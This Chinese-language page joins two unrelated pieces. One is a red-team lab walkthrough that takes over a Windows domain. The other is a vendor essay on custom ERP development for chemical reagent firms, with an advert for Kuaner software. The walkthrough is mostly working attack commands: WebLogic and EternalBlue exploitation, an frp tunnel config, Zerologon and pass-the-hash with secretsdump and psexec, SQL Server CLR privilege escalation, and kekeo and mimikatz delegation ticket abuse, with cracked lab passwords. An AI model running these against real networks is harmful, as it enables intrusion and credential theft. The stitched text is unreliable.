web服務(wù)器:
外網(wǎng)IP 192.160.0.100
內(nèi)網(wǎng)IP 10.10.20.12
域內(nèi)機器win7 :
內(nèi)網(wǎng)IP 10.10.20.7
內(nèi)網(wǎng)IP 10.10.10.7
域內(nèi)服務(wù)器 Mssql:
內(nèi)網(wǎng)IP 10.10.10.18
域控機器:
內(nèi)網(wǎng)IP 10.10.10.8
→點擊查看技術(shù)資料←
1.2000多本網(wǎng)絡(luò)安全系列電子書
2.網(wǎng)絡(luò)安全標(biāo)準(zhǔn)題庫資料
3.項目源碼
4.網(wǎng)絡(luò)安全基礎(chǔ)入門、Linux、web安全、攻防方面的視頻
5.網(wǎng)絡(luò)安全學(xué)習(xí)路線圖
搭建好環(huán)境,對目標(biāo)192.168.0.100進(jìn)行端口掃描探測
發(fā)現(xiàn)目標(biāo)開放了7001端口,進(jìn)行目錄掃描探測,發(fā)現(xiàn)weblogic登錄口
嘗試weblogic弱口令登錄不成功
通過weblogic漏洞利用工具,發(fā)現(xiàn)目標(biāo)存在CVE-2020-2551漏洞可以利用
ping www.baidu.com發(fā)現(xiàn)目標(biāo)機器出網(wǎng)
tasklist /svc 通過進(jìn)程對比發(fā)現(xiàn)主機上沒有安裝殺軟
直接powershell上線cs
通過執(zhí)行命令whoami /all發(fā)現(xiàn)存在雙網(wǎng)卡
通過hashdump抓取密碼Administrator ccef208c6485269c20db2cad21734fe7
ntlm hash值為ccef208c6485269c20db2cad21734fe7,通過cmd5解出明文密碼Admin12345
有了明文密碼我們可以進(jìn)行遠(yuǎn)程登陸,但真實環(huán)境中不到萬不得已一般不建議執(zhí)行此操作,因此尋找其他的方法進(jìn)行內(nèi)網(wǎng)橫向移動
通過上傳fscan掃描10網(wǎng)段,發(fā)現(xiàn)存在ms17-010漏洞的10.10.20.7主機
一開始打算通過Eternalblue直接上線cs,發(fā)現(xiàn)不成功,改用其他方法
項目地址:https://github.com/0xFenrik/Eternalblue
上傳frp搭建隧道代理
[common]#frpc配置
server_addr=VPS地址
server_port=7000
[plugin_socks]
type=tcp
remote_port=1080
plugin=socks5
[common]#frps配置
bind_addr=0.0.0.0
bind_port=7000改用metaspolit,調(diào)用永恒之藍(lán)模塊進(jìn)行攻擊,成功獲取shell
msf6 > setg Proxies socks5:frps服務(wù)端IP:監(jiān)聽端口
msf6 > setg ReverseAllowProxy true
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set payload windows/x64/meterpreter/bind_tcp
msf6 > set rhost 10.10.20.7
msf6 > run或者vi /etc/proxychains.conf修改配置文件socks5 127.0.0.1 1080
然后通過proxychains msfconsole啟動
成功后通過mimikatz執(zhí)行creds_all獲取賬戶密碼redteam\saul:admin!@#45
由于目標(biāo)機器win7不出網(wǎng),因此以跳板機器作為中轉(zhuǎn),新建一個監(jiān)聽器
通過psexec進(jìn)行上線
成功上線后進(jìn)行內(nèi)網(wǎng)掃描,探測存活主機,發(fā)現(xiàn)還存在10.10.10.8和10.10.10.18兩臺機器
通過信息搜集發(fā)現(xiàn)當(dāng)前機器是在域環(huán)境內(nèi)net user /domain
接著定位到域控 net group "domain controllers" /domain
ps:一般來說DNS服務(wù)器就是域控
影響版本:
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)通過CVE-2020-1472腳本進(jìn)行檢測
項目地址:https://github.com/SecuraBV/CVE-2020-1472
1、重置管理員密鑰,進(jìn)行置空
python3 cve-2020-1472-exploit.py OWA 10.10.10.8
2、通過 Dcsync 查看密碼hash
python secretsdump.py redteam.red/OWA$@10.10.10.8 -just-dc -no-pass
3、通過psexec和hash獲取域控權(quán)限
python psexec.py administrator@10.10.10.8 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7
4、使用secretsdump解析保存在本地的nt hash
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.save
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
5、通過reinstall腳本將$MACHINE.ACC:plain_password_hex中的原來nt hash恢復(fù)
python reinstall_original_pw.py OWA 10.10.10.8 8623dc75ede3ca9ec11f2475b12ef96d
1、通過adfind尋找約束委派的用戶,發(fā)現(xiàn)為sqlserver的機器
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
2、通過端口探測發(fā)現(xiàn)sqlserver為10.10.10.18機器
3、使用fscan進(jìn)行掃描fscan.exe -h 10.10.10.0/24 sqlserver為弱口令sa/sa
4、使用工具查看當(dāng)前權(quán)限SharpSQLTools.exe 10.10.10.18 sa sa master xp_cmdshell whoami
項目地址:https://github.com/uknowsec/SharpSQLTools/releases/tag/41
5、權(quán)限較低,使用以下命令進(jìn)行提權(quán):
SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami
SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami
6、上線CS并抓到sqlserver的密碼redteam\sqlserver Server12345
根據(jù)先前的信息搜集可知 sqlserver 是一個約束委派用戶,可以通過約束委派攻擊來接管域控
項目地址:https://github.com/gentilkiwi/kekeo/releases
1、利用 kekeo 請求該用戶的 TGT
kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi"
2、然后使用這張紙 TGT 獲取域機器的 ST
kekeo.exe "tgs::s4u /tgt: TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi /user:Administrator@redteam.red /service:cifs/owa.redteam.red"
3、使用 mimikatz 將 ST 導(dǎo)入當(dāng)前會話,運行 mimikatz 進(jìn)行 ptt
mimikatz kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi
4、成功獲取域控權(quán)限
最后
點擊查看【網(wǎng)絡(luò)安全學(xué)習(xí)資料·攻略】
由于化學(xué)與生物試劑行業(yè)產(chǎn)品種類多,業(yè)務(wù)流程復(fù)雜。通用ERP往往適用性較差,不少企業(yè)選擇定制開發(fā)管理系統(tǒng),以適應(yīng)企業(yè)業(yè)務(wù)發(fā)展。
筆者為寬爾產(chǎn)品負(fù)責(zé)人,常年從事化學(xué)與生物類管理軟件的開發(fā)與實施。總結(jié)了企業(yè)在ERP定制開發(fā)過程中可能遇到的一些問題,僅供參考。
定制開發(fā)ERP的有以下優(yōu)點:
這些優(yōu)點背后,其實隱藏了諸多條件要求,在此略做分析。
1、甲方要有即懂業(yè)務(wù)流程又懂軟件開發(fā)的人才
《人人都是產(chǎn)品經(jīng)理》一書寫到:聽用戶的但不要照著做。筆者對此深以為然,每個人都有自己愛吃的菜,但并不意味著他有能力指導(dǎo)后廚,如何制作這道美食。
ERP定制開發(fā)也一樣,企業(yè)了解自身的業(yè)務(wù),但對軟件開發(fā)知之甚少。由甲方主導(dǎo)的定制型項目,失敗率超過70%。
正因為以上原因,第三方咨詢公司應(yīng)運而生,比如鼎鼎大名的麥肯錫。企業(yè)提出需求,咨詢公司出方案,再交由軟件公司實現(xiàn)。從而避免了外行指導(dǎo)內(nèi)行的尷尬局面。
2、定制軟件時以管理目標(biāo)的達(dá)成為導(dǎo)向,避免強制乙方完全按照意愿行事
如果開發(fā)人員經(jīng)驗豐富,在軟件交互、業(yè)務(wù)流程上能夠給企業(yè)足夠的意見。那著實可遇不可求,甲方切不可盲目堅持已見。
否則,開發(fā)人員完全躺平,按照完全甲方思路開發(fā),最終可能開發(fā)出的是一款Excel式管理系統(tǒng)(數(shù)據(jù)修改方便,但準(zhǔn)確性難以保障)。
3、乙方開發(fā)經(jīng)驗豐富,除了具備編程能力,還要擁有較強的業(yè)務(wù)理解能力
ERP要平衡效率與管理,這要求懂開發(fā)人員必須懂業(yè)務(wù)。比如,采購已入庫,成本單價怎么修改?發(fā)票跨月,如何作廢?如果可以隨時修改,不僅財務(wù)無法對賬,成本自由變化,負(fù)責(zé)審核訂單的領(lǐng)導(dǎo)也是一臉尷尬。
這些小的細(xì)節(jié)問題,一般很難在初期發(fā)現(xiàn),只有上線運行一段時間才能暴露。能否提前預(yù)判這些問題,也是選擇服務(wù)商的重要標(biāo)準(zhǔn)。
下面再講講缺點。筆者不打算在成本、周期等顯而易見的問題上浪費筆墨,主要講一些容易忽略事實。
1、溝通成本遠(yuǎn)超軟件開發(fā)成本
筆者認(rèn)為,想要做好一款軟件產(chǎn)品,必須完全了解用戶需求。化學(xué)、生物試劑行業(yè)特殊,專業(yè)術(shù)語較多。COA、MSDS、結(jié)構(gòu)式這些概念就得解釋半天。
如果乙方?jīng)]有化學(xué)、生物行業(yè)開發(fā)經(jīng)驗,那么開發(fā)過程的溝通成本將遠(yuǎn)超預(yù)期。最終會導(dǎo)致項目雙方相互抱怨。
2、無休止的商業(yè)談判、扯皮
軟件開發(fā)一般采用瀑布模型,即事先確定開發(fā)內(nèi)容與計劃,并嚴(yán)格按照計劃執(zhí)行。
可是一款ERP沒有成型,沒有正式跑流程,誰敢打包票功能一定適合?上線后想再修改一下,會涉及合同變更,又是冗長的談判。
至于幾萬塊的合同,就敢承諾修改到滿意為止的ERP軟件商,不是壞就是傻。程序員薪資那么高,怎敢如此承諾?更何況行業(yè)小微公司眾多,對定制開發(fā)的成本預(yù)期著實沒譜。
3、外行指導(dǎo)內(nèi)行
資深產(chǎn)品經(jīng)理年薪一般30-50W,資深軟件工程師年薪也不低于 30W。
出于成本考慮,10W以下的合同,外包軟件公司不會安排這些資深人員。1-2個應(yīng)屆畢業(yè)生+懂點業(yè)務(wù)的實施員是標(biāo)配。
這樣的組合,往往導(dǎo)致乙方極為弱勢,一切聽?wèi){甲方指揮(外行指導(dǎo)內(nèi)行)。開發(fā)出的ERP缺乏整體性思考。設(shè)計思想分裂,操作風(fēng)格不統(tǒng)一,業(yè)務(wù)邏輯孤立。
4、定制產(chǎn)品無法迭代更新,導(dǎo)致企業(yè)管理水平固化,跟不上行業(yè)發(fā)展
軟件行業(yè)流行一句話:一流公司做平臺,二流公司做產(chǎn)品,三流公司做外包。筆者十年前所在單位,曾與騰訊合作定制過一款專用QQ。
十年后的今天,QQ增加移動端、共享磁盤、共享文件、遠(yuǎn)程桌面等一系列新功能。而那款定制化產(chǎn)品,還是Windows XP 的外觀,被丟進(jìn)了時代的垃圾桶。
選擇一款合適的產(chǎn)品化ERP,保持更新。滿足您業(yè)務(wù)的需求的同時,還能夠匯聚全行業(yè)智慧,享受軟件更新帶來的管理思想升級。
5、修復(fù)軟件BUG是理所應(yīng)當(dāng)?shù)模?/span>
也許企業(yè)會所想當(dāng)然的認(rèn)為修復(fù)BUG是乙方的義務(wù),這可能是一廂情愿。定制開發(fā)合同有軟件質(zhì)保期的概念,約定時間為一年。如果一年后甲方再發(fā)現(xiàn)軟件BUG,則不再免費修復(fù)。
筆者早些年一直為化學(xué)、生物企業(yè)定制開發(fā)ERP。因為一直從事特定行業(yè)的ERP定制,所以80%的功能是現(xiàn)成的,僅需局部定制即可,但最終團(tuán)隊還是出現(xiàn)了重大的效率問題。
比如,某天發(fā)一個系統(tǒng)BUG,而之前定制的幾十家公司全都有此問題,是否給他們修復(fù)?如果不修復(fù),影響口碑。如果修復(fù),幾十家的代碼需全部排查、修改、發(fā)布一遍,足夠十個人的技術(shù)團(tuán)隊忙上二周。
筆者在此之后,逐步放棄了ERP定制的業(yè)務(wù)。改用基于可組態(tài)的思想,全力打造支持半定制化的產(chǎn)品。企業(yè)可按需修改流程、功能,且不影響系統(tǒng)的自動更新。
寬爾C3|化學(xué)進(jìn)銷存管理系統(tǒng)|倉庫管理系統(tǒng)-寬爾ERP官網(wǎng)www.kuanersoft.com/product-c3yun
5、實施及文檔支持
很多人會說,完全為自己定制的產(chǎn)品,業(yè)務(wù)員都參與了,肯定上手更快。事實真的如此嗎?
產(chǎn)品化的ERP,開發(fā)團(tuán)隊會持續(xù)優(yōu)化軟件體驗、豐富使用文檔。新人至少有能力通過自主學(xué)習(xí),掌握ERP使用。而定制開發(fā)的產(chǎn)品誰會幫企業(yè)做這些文檔工作?即使有,也不過是一些形式上的使用手冊而以。
況且,鐵打的營盤,流水的兵。也許有一天,當(dāng)初負(fù)責(zé)ERP的員工、寫代碼程序員都離職了,誰來負(fù)責(zé)ERP的實施呢?
綜上,企業(yè)在ERP選型時,要盡可能的多找?guī)准臆浖?wù)商,綜合利弊加以選擇。